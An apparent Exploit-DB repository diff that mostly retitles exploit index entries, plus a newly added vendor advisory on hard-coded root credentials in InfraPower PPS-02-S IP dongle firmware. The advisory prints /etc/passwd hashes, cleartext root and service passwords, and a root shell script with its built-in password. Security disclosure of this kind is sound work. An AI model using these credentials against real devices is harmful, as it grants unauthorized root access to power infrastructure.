DB: 2016-10-29

7 new exploits

SetCMS 3.6.5 - (setcms.org) Remote Command Execution
SetCMS 3.6.5 - Remote Command Execution
PHP-Nuke < 8.0 - 'sid' SQL Injection
PHP-Nuke 8.0 Final - 'sid' SQL Injection
PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection
PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection

Foojan Wms 1.0 - (index.php story) SQL Injection
Foojan Wms 1.0 - 'story' Parameter SQL Injection

Web Wiz Forums 9.07 - (sub) Directory Traversal
Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal
Web Wiz NewsPad 1.02 - (sub) Directory Traversal
Siteman 1.1.9 - (cat) Remote File Disclosure
Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution
SLAED CMS 2.5 Lite - (newlang) Local File Inclusion
Liquid-Silver CMS 0.1 - (update) Local File Inclusion
Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal
Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure
Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution
SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion
Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion
Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure
ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)
Seagull 0.6.3 - 'files' Parameter Remote File Disclosure
ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)

flinx 1.3 - (category.php id) SQL Injection
flinx 1.3 - 'id' Parameter SQL Injection

Persits XUpload 3.0 - AddFile() Remote Buffer Overflow
Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow

simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection
WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection
Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)
Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)
WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection
WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection
Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)
Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)
phpMyClub 0.0.1 - (page_courante) Local File Inclusion
bubbling library 1.32 - dispatcher.php Remote File Disclosure
Bigware Shop 2.0 - pollid SQL Injection
Smart Publisher 1.0.1 - (disp.php) Remote Code Execution
SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit
phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion
bubbling library 1.32 - 'uri' Parameter Remote File Disclosure
Bigware Shop 2.0 - 'pollid' Parameter SQL Injection
Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution
SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit
phpCMS 1.2.2 - (parser.php) Remote File Disclosure
Mambo Component NewsLetter - (listid) SQL Injection
Mambo Component Fq - (listid) SQL Injection
Mambo Component MaMML - (listid) SQL Injection
phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure
Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection
Mambo 'com_fq' - 'listid' Parameter SQL Injection
Mambo 'com_mamml' - 'listid' Parameter SQL Injection
phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion
phpCMS 1.1.7 - 'counter.php' Remote File Inclusion
phpCMS 1.1.7 - 'parser.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion
phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion

phpCMS 2008 - 'ask/search_ajax.php' SQL Injection
phpCMS 2008 - 'search_ajax.php' SQL Injection
InfraPower PPS-02-S Q213V1 - Local File Disclosure
InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference
InfraPower PPS-02-S Q213V1 - Authentication Bypass
InfraPower PPS-02-S Q213V1 - Multiple XSS
InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery
InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials
InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution

files.csv

@@ -4610,53 +4610,53 @@ id,file,description,date,author,platform,type,port
 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0
 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0
 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
-4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
+4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
 4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
-4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
+4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
-4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
+4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
 4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
 4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0
-4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
+4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
-4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
+4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
 4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
-4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
+4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
-4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
+4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
-4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0
+4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote,0
-4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
+4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
-4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0
+4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0
 4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0
 4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0
 4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0
-4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
+4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
-4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
+4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
 4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
 4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0
-4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0
+4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0
 4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0
-4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
+4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
 4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0
-4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0
+4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0
 4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0
 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0
-4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
+4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
-4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
+4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
-4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
+4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
-4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
+4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
 4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
-5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
+5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
-5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0
+5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0
-5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0
+5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0
-5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
+5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
-5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
+5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
-5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
+5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
-5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
-5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
+5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
 5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
 5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
@@ -26419,16 +26419,16 @@ id,file,description,date,author,platform,type,port
 29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
 29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
 29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
-29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
-29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
+29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
 29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0
 29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0
 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0
@@ -29720,7 +29720,7 @@ id,file,description,date,author,platform,type,port
 32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0
 32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0
 32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
-32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
+32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
 32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0
 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
 32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
@@ -36728,6 +36728,13 @@ id,file,description,date,author,platform,type,port
 40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
 40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
 40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
+40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0
+40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0
+40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
+40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple XSS",2016-10-28,LiquidWorm,php,webapps,0
+40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
+40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0
+40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
 40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0

platforms/hardware/remote/40643.txt

@@ -0,0 +1,195 @@
+InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from a use of hard-coded credentials. The IP
+dongle firmware ships with hard-coded accounts that can be used to gain
+full system access (root) using the telnet daemon on port 23.
+
+Tested on: Linux 2.6.28 (armv5tel)
+           lighttpd/1.4.30-devel-1321
+           PHP/5.3.9
+           SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+                           @zeroscience
+
+
+Advisory ID: ZSL-2016-5371
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
+
+
+27.09.2016
+
+--
+
+
+# cat /etc/passwd
+
+root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
+
+# showing accounts in root group:
+
+Username: root
+Password: 8475
+--
+Username: service
+Password: ipdongle
+--
+Username: www
+Password: 9311
+--
+Username: www2
+Password: 9311
+
+# showing other less-privileged accounts: 
+
+Username: user
+Password: 8475
+--
+Username: admin
+Password: 8475
+
+--------
+
+/mnt/mtd # echo $SHELL
+/sbin/root_shell.sh
+/mnt/mtd # cat /sbin/root_shell.sh 
+#!/bin/sh
+trap ""  2 3 9 24
+
+# check login
+passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
+
+if [ "$passWork" = "1" ]; then
+  login_file=/mnt/mtd/root_login
+  now_timestamp=`date +%s`
+
+  if [ -f $login_file ]; then
+    line=`wc -l $login_file | cut -c 1-9`
+    if [ "$line" != "        0" ] && [ "$line" != "        1" ] && [ "$line" != "        2" ]; then
+      pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
+      pre_result1=`echo $pre_login | cut -d " " -f 1`
+      pre_result2=`echo $pre_login | cut -d " " -f 2`
+      pre_result3=`echo $pre_login | cut -d " " -f 3`
+      if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
+        pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
+        result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
+        if [ "$result" != "success" ]; then
+          echo $result
+          exit 0
+        fi
+      fi
+    fi
+  fi
+
+  echo -n "password:"
+  read pass
+  if [ "$pass" != "999" ]; then
+    echo "wrong password"
+    echo fail $now_timestamp >> $login_file
+    exit 0
+  fi
+  echo success $now_timestamp >> $login_file
+fi
+
